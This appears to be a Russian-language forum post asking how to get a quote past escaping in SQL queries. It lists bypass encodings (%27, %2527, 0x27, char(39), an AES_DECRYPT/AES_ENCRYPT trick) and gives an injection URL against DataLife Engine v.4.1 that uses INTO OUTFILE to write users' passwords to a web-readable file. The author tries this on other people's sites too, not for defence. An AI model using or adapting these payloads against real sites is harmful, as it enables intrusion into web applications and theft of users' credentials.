например простейший запрос
SELECT * FROM users where name = 'geborat'
непроходит превращается в
SELECT * FROM users where name = 'geborat\'
в hex формате ковычка проходит но такой запрос не выполняется
SELECT * FROM users where name = 'geborat char(0x27)
выполняется в таком формате
SELECT * FROM users where name = 0x6765626f726174
но первую ковычку я убрать не могу так как она добавляется
самим php скриптом кроме того символ \тоже обрабатывается
он просто удваевается запрос
SELECT * FROM users where name = '\geborat
превращается в
SELECT * FROM users where name = '\\geborat
как еще можно попробовать вставить ковычку

%27
%2527
0x27
char(39)
AES_DECRYPT(AES_ENCRYPT(blabla_string,0x71),0x71), где 0х71 просто ключ

в движке DataLife Engine v.4.1
мне удалось создать текстовый файл с паролями пользователей
_http://geborat.ru/index.php?subaction=userinfo&user=geborat%2527 INTO OUTFILE %2527/home/geborat.ru/www/1234.txt
правда почему то работает только на локахосте
на чужих сайтах запрос идет но файл не создается
может прав на запись нет или что то еще

к сожалению в DataLife Engine v.4.5 вобще не работает так как
закодираваную ковычку %2527 он распознает